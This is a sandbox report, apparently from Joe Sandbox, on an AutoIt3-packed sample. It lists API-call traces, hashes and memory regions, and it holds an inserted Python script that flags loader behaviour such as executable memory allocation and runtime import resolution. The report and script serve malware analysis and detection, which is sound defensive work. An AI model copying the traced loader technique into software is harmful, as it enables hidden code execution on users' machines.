                                      • Instruction ID: 49a89f0088b172aa72f33c5949ae0334465586cba64f598a40ae1f445ee6e645
                                      • Opcode Fuzzy Hash: 54e9caaeeea232c8f5b10cc8ae3c22ee1cfdecd395bbeddf28086b5de3fc6b3b
                                      • Instruction Fuzzy Hash: 4B512DB1904229AFDF249F68DC41A9EBBB9FF48304F01059EF649E3281DB715A84CF59
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
• Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                      • String ID:
                                      • API String ID: 1559183368-0
                                      • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                      • Instruction ID: e9be11f5930af096f683c51a73fa2af162279a0c7cd45abf0a265e2d365a2f36
                                      • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                      • Instruction Fuzzy Hash: 8A51D270A80B29DFDB248EA9E88466E77B1FF50324F648729F835D62D0D7709DD08B40
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008052E6
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0080534A
                                      • TranslateMessage.USER32(?), ref: 00805356
                                      • DispatchMessageW.USER32(?), ref: 00805360
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
• Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Message$Peek$DispatchTranslate
                                      • String ID:
                                      • API String ID: 1795658109-0
                                      • Opcode ID: 77ec4fb9b45517ea2a353d90ae806c80dc1e05ea6a7fb386436ef69778897f95
                                      • Instruction ID: 32384b9d1bf4a9c09b1ad3c8f11920db3f0fd6475ba819e68e038112e1d48dd1
                                      • Opcode Fuzzy Hash: 77ec4fb9b45517ea2a353d90ae806c80dc1e05ea6a7fb386436ef69778897f95
                                      • Instruction Fuzzy Hash: 58311230508B0A9FEB708B64EC84FAB77B8FB42344F15406AE512D62E1DBB19884DF61
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00801275,SwapMouseButtons,00000004,?), ref: 008012A8
                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00801275,SwapMouseButtons,00000004,?), ref: 008012C9
                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00801275,SwapMouseButtons,00000004,?), ref: 008012EB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
• Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: Control Panel\Mouse
                                      • API String ID: 3677997916-824357125
                                      • Opcode ID: da34a564ab26fc9fdf3cb0e1c605afcb784f5498f97f67758bc8b615b782e225
                                      • Instruction ID: 916cbba94bbb1862333b7fae5041b00ea129245af6aff29ea9553bab54601810
                                      • Opcode Fuzzy Hash: da34a564ab26fc9fdf3cb0e1c605afcb784f5498f97f67758bc8b615b782e225
                                      • Instruction Fuzzy Hash: C7114571610208BFDF61CFA8DC88AAEBBA8FF05751F00456AE809D7250E2319E409BA0
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 011D752A
                                      • LoadLibraryA.KERNEL32(?,00000000,00000000,00001000,00000040), ref: 011D75C9
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 011D762D
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 011D7644
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AddressProc$AllocLibraryLoadVirtual
                                      • String ID:
                                      • API String ID: 857568384-0
                                      • Opcode ID: 07b4a39dda95eb49eeca4de4c5c3682a3a78871ee9eac48f98c00806c9a77f70
                                      • Instruction ID: 28bd2dc663df031dfa26eee7ab7cc98dd6254d099689df92f17a64900c78adbb
                                      • Opcode Fuzzy Hash: 07b4a39dda95eb49eeca4de4c5c3682a3a78871ee9eac48f98c00806c9a77f70
                                      • Instruction Fuzzy Hash: 0E81E371A002299FDB69CF28CC81BD9B3B5FF59314F0586D5E948A7341E770AE908F91
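The entry above (VirtualAlloc with flProtect 00000040, i.e. PAGE_EXECUTE_READWRITE, followed by LoadLibraryA and two GetProcAddress calls, in a region the report marks "based on PE: false") and the earlier entry at 03CF8AF4 (GetModuleHandleA on kernel32.dll, LoadLibraryA on Urlmon.dll, with a string table of DLL names) are the API shape of a loader that resolves its imports at runtime. The following is an added example, not Joe Sandbox's code and not code from the sample: a Python triage script that parses API-call lines in exactly the format this report uses ("• Api.MODULE(args), ref: ADDR"), groups them per function entry, and flags executable allocation combined with runtime import resolution, library loads by literal DLL name, and whole-file reads. The three sample entries are copied from this report's listings as constructed input; the entry labels (fn_<first ref>), the rule names and the EXECUTE_MASK constant are my own.

```python
"""Triage Joe Sandbox-style API listings for loader-like behaviour.

Added example, not part of the Joe Sandbox report or the analysed sample.
Parses lines of the form "• Api.MODULE(arg,arg,...), ref: ADDR" and flags
per-function patterns. Argument values are taken as the sandbox captured
them (hex literals or "?" when unknown).
"""
import re
from typing import Dict, List, Optional

API_LINE = re.compile(
    r"^\s*•\s*(?P<api>[A-Za-z0-9_]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY
# occupy bits 0x10..0x80 of the flProtect argument (assumed mask, my own constant).
EXECUTE_MASK = 0xF0

# Constructed sample: API lines copied from three entries in this report,
# keyed by the first ref address of each entry (label is my own).
SAMPLE_ENTRIES = {
    "fn_011D752A": """\
• VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 011D752A
• LoadLibraryA.KERNEL32(?,00000000,00000000,00001000,00000040), ref: 011D75C9
• GetProcAddress.KERNEL32(00000000,?), ref: 011D762D
• GetProcAddress.KERNEL32(00000000,?), ref: 011D7644
""",
    "fn_03CF8AFF": """\
• GetModuleHandleA.KERNEL32(kernel32.dll,?,03D219A1,00000000,03D21FA7,?,00000014,00000000,00000000), ref: 03CF8AFF
• LoadLibraryA.KERNELBASE(Urlmon.dll,?,03D219A1,00000000,03D21FA7,?,00000014,00000000,00000000), ref: 03CF8B2B
""",
    "fn_011D7221": """\
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,011D7270), ref: 011D7221
• GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,011D7270), ref: 011D7230
• ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,011D7270), ref: 011D724F
• CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 011D7255
""",
}


def _hex_arg(args: List[str], index: int) -> Optional[int]:
    """Return argument `index` as an int when the report gives a hex literal, else None."""
    if index >= len(args):
        return None
    try:
        return int(args[index], 16)
    except ValueError:  # "?" or a string literal such as a DLL name
        return None


def parse_api_calls(text: str) -> List[Dict]:
    """Parse every API-call line in one report entry into a list of dicts."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append({"api": m.group("api"), "module": m.group("module"),
                      "args": args, "ref": int(m.group("ref"), 16)})
    return calls


def flag_entry(calls: List[Dict]) -> List[str]:
    """Apply the three loader-oriented rules to the calls of a single function."""
    apis = {c["api"] for c in calls}
    findings: List[str] = []
    # Rule 1: VirtualAlloc whose 4th argument (flProtect) has an execute bit set.
    exec_alloc = any(
        c["api"] == "VirtualAlloc" and ((_hex_arg(c["args"], 3) or 0) & EXECUTE_MASK)
        for c in calls)
    # Rule 2: GetProcAddress together with a module-handle/library-load call.
    resolves = ("GetProcAddress" in apis) and bool(
        apis & {"LoadLibraryA", "LoadLibraryW", "GetModuleHandleA", "GetModuleHandleW"})
    if exec_alloc and resolves:
        findings.append("executable allocation combined with runtime import resolution")
    elif exec_alloc:
        findings.append("executable virtual allocation")
    elif resolves:
        findings.append("runtime import resolution")
    # Rule 2b: LoadLibrary* with a literal DLL name as first argument.
    for c in calls:
        if c["api"].startswith("LoadLibrary") and c["args"] and c["args"][0].lower().endswith(".dll"):
            findings.append(f"loads {c['args'][0]} by literal name")
    # Rule 3: open, size, single read: the whole file is pulled into memory.
    if {"GetFileSize", "ReadFile"} <= apis and apis & {"CreateFileA", "CreateFileW"}:
        findings.append("reads a whole file into memory (size then single ReadFile)")
    return findings


def scan(entries: Dict[str, str]) -> Dict[str, List[str]]:
    """Run flag_entry over every entry; returns {entry label: [findings]}."""
    return {name: flag_entry(parse_api_calls(text)) for name, text in entries.items()}


if __name__ == "__main__":
    for name, found in scan(SAMPLE_ENTRIES).items():
        print(name, "->", "; ".join(found) or "nothing flagged")
```

The rules deliberately key on argument values the report actually prints (the 00000040 protection, the .dll literal), not on API names alone, because RegisterClassExW/LoadIconW-style entries from the legitimate AutoIt3 runtime in the same report would otherwise drown the loader in noise. Entries whose VirtualAlloc arguments are "?" get no Rule 1 hit, which is the conservative choice for a triage pass.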
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,03CF3EF8,?,00000000,03CF3F18,?,?,?,?), ref: 03CF3EAB
                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,03CF3EF8,?,00000000,03CF3F18), ref: 03CF3EBA
                                      • ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003), ref: 03CF3EE3
                                      • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000), ref: 03CF3EE9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 3919263394-0
                                      • Opcode ID: 80f7c3c20f187a83e12885b6ba50243d9c53380cd9ee8f81ebdfaf8b43ff2323
                                      • Instruction ID: 892a2dc71052696db4930f5cac2a5fc05bb3c8f7733faf015fcde64a9189577b
                                      • Opcode Fuzzy Hash: 80f7c3c20f187a83e12885b6ba50243d9c53380cd9ee8f81ebdfaf8b43ff2323
                                      • Instruction Fuzzy Hash: 7D11B678654384BFE761DB74CC62F6EB7ECEB08710F624479F610EA1C0D6719A10A660
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,011D7270), ref: 011D7221
                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,011D7270), ref: 011D7230
                                      • ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,011D7270), ref: 011D724F
                                      • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 011D7255
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 3919263394-0
                                      • Opcode ID: b662da7dfe0c0a757d22dfea999a3d1748300f09e28cbaf1b40ba4a321631cb9
                                      • Instruction ID: 276b57316b39087cf42b8f544092c835450a10d4b6f62ad929b41bb2f2828839
                                      • Opcode Fuzzy Hash: b662da7dfe0c0a757d22dfea999a3d1748300f09e28cbaf1b40ba4a321631cb9
                                      • Instruction Fuzzy Hash: 481170B0A04344BEE715DB78CC92F5DBBE8EF19714F2046A9F564E71D1D77569008720
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,011D7270), ref: 011D7221
                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,011D7270), ref: 011D7230
                                      • ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,011D7270), ref: 011D724F
                                      • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 011D7255
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 3919263394-0
                                      • Opcode ID: 26c939c3512850c9cc18b8553418a1a0485619999635100ce54f8a48772dffc8
                                      • Instruction ID: 7096fe016682f2ad30b572625a44bcdc7ab07e956bb4754db2905258fbf78774
                                      • Opcode Fuzzy Hash: 26c939c3512850c9cc18b8553418a1a0485619999635100ce54f8a48772dffc8
                                      • Instruction Fuzzy Hash: 581144B0614305BEE718EF78CC82F5DB7ECEB18714F604565B524E61D0E7756E008764
                                      APIs
                                        • Part of subcall function 008149C2: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,008127AF,?,00000001), ref: 008149F4
                                      • _free.LIBCMT ref: 0084FB04
                                      • _free.LIBCMT ref: 0084FB4B
                                        • Part of subcall function 008129BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00812ADF
                                      Strings
                                      • Bad directive syntax error, xrefs: 0084FB33
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                      • String ID: Bad directive syntax error
                                      • API String ID: 2861923089-2118420937
                                      • Opcode ID: 71e125da9b433b31b24ed4bd49c1340fb41419558ba40853a088f5be9cfcbc27
                                      • Instruction ID: 1e1ed7e605db2d04a7254291030f207214c2dee75799be3d01672333e268b299
                                      • Opcode Fuzzy Hash: 71e125da9b433b31b24ed4bd49c1340fb41419558ba40853a088f5be9cfcbc27
                                      • Instruction Fuzzy Hash: A691707191022DAFCF04EFA8C8519EEBBB8FF15314F14442AF915EB2A2DB309945CB51
                                      APIs
                                        • Part of subcall function 00814AB2: __fread_nolock.LIBCMT ref: 00814AD0
                                      • _wcscmp.LIBCMT ref: 00869DE1
                                      • _wcscmp.LIBCMT ref: 00869DF4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _wcscmp$__fread_nolock
                                      • String ID: FILE
                                      • API String ID: 4029003684-3121273764
                                      • Opcode ID: 094a275008508664fb80f3275e26085e74a69e5f2c99c49638229f747d302b9e
                                      • Instruction ID: f17606a902fa1e2ff99ea32b9c1480941c2568b599310f68a1e8af54b2cb2934
                                      • Opcode Fuzzy Hash: 094a275008508664fb80f3275e26085e74a69e5f2c99c49638229f747d302b9e
                                      • Instruction Fuzzy Hash: 1341E571A40219BADF219BA8CC45FEF77BDFF45710F01046AF940E7280D6B199448765
                                      APIs
                                      • MessageBoxA.USER32(00000000,Executing manually will not work,011D7E19,00000000), ref: 011D7BC9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Message
                                      • String ID: Executing manually will not work$tdFBRmkc
                                      • API String ID: 2030045667-1191883203
                                      • Opcode ID: 91932bd5407034c11f17bca9de9d7144b0d15719f919ea9fd83d6b03d3b44e20
                                      • Instruction ID: bb3283323d6a57cd3cd2dfe3ef12bfb7db1e055cc840fe47eba4564e8e1ed9f8
                                      • Opcode Fuzzy Hash: 91932bd5407034c11f17bca9de9d7144b0d15719f919ea9fd83d6b03d3b44e20
                                      • Instruction Fuzzy Hash: 4121657461AB09AFDB0DEB60D892BDC73B5EBA830CF60447AE410A36C1DB349945CB13
                                      APIs
                                      • _memset.LIBCMT ref: 0085032B
                                      • GetOpenFileNameW.COMDLG32(?), ref: 00850375
                                        • Part of subcall function 00820284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00812A58,?,00008000), ref: 008202A4
                                        • Part of subcall function 008209C5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008209E4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Name$Path$FileFullLongOpen_memset
                                      • String ID: X
                                      • API String ID: 3777226403-3081909835
                                      • Opcode ID: 7f25d0c0af6cf879db9e8ee9c66dc7262c72c1094f5ca3d5015268aa5e35d2ef
                                      • Instruction ID: 6ca11da25fc4c50d9849d5fd6a05be9d520385d7609c63b984344d67384f996f
                                      • Opcode Fuzzy Hash: 7f25d0c0af6cf879db9e8ee9c66dc7262c72c1094f5ca3d5015268aa5e35d2ef
                                      • Instruction Fuzzy Hash: 0B219F71A002989BDF419F98D805BEE7BBCFF49305F00405AE904E7241DBB49A88DFA2
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a6641e1912ddd3ec61b99acebbffbca88814bd98d08b40f851785332c6a22efb
                                      • Instruction ID: 1740365c9062751776cbe72f9c6df1bfdc766ec7e4ed242ac118377872f51062
                                      • Opcode Fuzzy Hash: a6641e1912ddd3ec61b99acebbffbca88814bd98d08b40f851785332c6a22efb
                                      • Instruction Fuzzy Hash: DCF106B16083019FC714DF28C885A6ABBE5FF88314F14892EF999DB251D731E945CF92
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      • Opcode ID: 86e7d957f919bdaccfc6ef1242d119d2f5d482c5631b219dbe878fc2b55dece2
                                      • Instruction ID: 9253dff3e97ea9a7eaf2f226ea8fc7eeaa6dee709ab55e3ceccd982ed7badab7
                                      • Opcode Fuzzy Hash: 86e7d957f919bdaccfc6ef1242d119d2f5d482c5631b219dbe878fc2b55dece2
                                      • Instruction Fuzzy Hash: EB61BE7160020DEBDF048F29D984AAA77B8FF54310F5585A9EC19CF399EB31D9A0CB51
                                      APIs
                                        • Part of subcall function 0081FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00884186,00000001,00890980), ref: 0081FFA7
                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0080AD08
                                      • OleInitialize.OLE32(00000000), ref: 0080AD85
                                      • CloseHandle.KERNEL32(00000000), ref: 00842F56
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Handle$CloseInitializeMessageRegisterWindow
                                      • String ID:
                                      • API String ID: 3815369404-0
                                      • Opcode ID: fed4d88d7e2977f7e2bf7ea76ffa901e2cd6c70f95edc2b49d925a87bdbff401
                                      • Instruction ID: 478949a03bb58be3e529bdddedb0009351b1d4b49fed014d460a2a280887a2e3
                                      • Opcode Fuzzy Hash: fed4d88d7e2977f7e2bf7ea76ffa901e2cd6c70f95edc2b49d925a87bdbff401
                                      • Instruction Fuzzy Hash: D14100B09092848EC389EF7EBC44E587BF8FB58310710826AE529C33B2EB304444CF5A
                                      APIs
                                      • __FF_MSGBANNER.LIBCMT ref: 00825953
                                        • Part of subcall function 0082A39B: __NMSG_WRITE.LIBCMT ref: 0082A3C2
                                        • Part of subcall function 0082A39B: __NMSG_WRITE.LIBCMT ref: 0082A3CC
                                      • __NMSG_WRITE.LIBCMT ref: 0082595A
                                        • Part of subcall function 0082A3F8: GetModuleFileNameW.KERNEL32(00000000,008C53BA,00000104,00000004,00000001,00821003), ref: 0082A48A
                                        • Part of subcall function 0082A3F8: ___crtMessageBoxW.LIBCMT ref: 0082A538
                                        • Part of subcall function 008232CF: ___crtCorExitProcess.LIBCMT ref: 008232D5
                                        • Part of subcall function 008232CF: ExitProcess.KERNEL32 ref: 008232DE
                                        • Part of subcall function 00828D58: __getptd_noexit.LIBCMT ref: 00828D58
                                      • RtlAllocateHeap.NTDLL(00E90000,00000000,00000001,?,00000004,?,?,00821003,?), ref: 0082597F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                      • String ID:
                                      • API String ID: 1372826849-0
                                      • Opcode ID: e18f9e501008aafb79d427034be402ed9e251bf4250fb98b522f553c1e5a33b6
                                      • Instruction ID: 682a6956a5043504ad5fc11a2f8042b9ca2ef55d3426e719e6186c793fafd38f
                                      • Opcode Fuzzy Hash: e18f9e501008aafb79d427034be402ed9e251bf4250fb98b522f553c1e5a33b6
                                      • Instruction Fuzzy Hash: AD01F531282B36EBEA156728BC12B2E3658FF42770F100026F814EB2D1DE749DC14662
                                      APIs
                                      • _free.LIBCMT ref: 008692D6
                                        • Part of subcall function 00822F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00829C54,00000000,00828D5D,008259C3), ref: 00822F99
                                        • Part of subcall function 00822F85: GetLastError.KERNEL32(00000000,?,00829C54,00000000,00828D5D,008259C3), ref: 00822FAB
                                      • _free.LIBCMT ref: 008692E7
                                      • _free.LIBCMT ref: 008692F9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
